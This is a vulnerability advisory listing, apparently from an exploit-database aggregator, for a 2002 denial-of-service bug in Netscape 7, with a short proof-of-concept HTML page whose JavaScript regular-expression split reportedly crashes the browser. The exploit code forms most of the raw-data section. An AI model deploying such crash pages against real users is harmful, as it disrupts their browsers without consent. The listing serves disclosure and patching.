Netscape Denial of Service Vulnerability

vendor:

Netscape Browser

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Netscape Browser

Affected Version From: Netscape 7

Affected Version To: Netscape 7

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2002

Netscape Denial of Service Vulnerability

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when executing certain JavaScript methods. If a malicious page containing a specially crafted JavaScript regular expression method is viewed the browser reportedly becomes un-stable this may result in the critical failure of an affected browser.

Mitigation:

Ensure that all web browsers are kept up to date with the latest security patches.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6959/info

It has been reported that Netscape based browsers may be vulnerable to a denial of service condition when executing certain JavaScript methods.

If a malicious page containing a specially crafted JavaScript regular expression method is viewed the browser reportedly becomes un-stable this may result in the critical failure of an affected browser.

This vulnerability was reported for Netscape version 7. It is not known if previous versions are also affected. 

<html>
<head>
<title>test</title>
<--script-- language="JavaScript">
function reformatDate(someDate) {
var tokens = someDate.split(/(\/|-)/);
if (tokens[1].length == 1) tokens[1] = "0" + tokens[1];
if (tokens[0].length == 1) tokens[0] = "0" + tokens[0];
var result = tokens[2] + tokens[1] + tokens[0];
alert(result);
//return result;
}
</--script-->
</head>
<body>
<form action="" method="GET" name="form1" onSubmit="return reformatDate(this.dt.value);">
MM/DD/YYYY - <input type=text name=dt>
<input type=submit>
</form>
</body>
</html>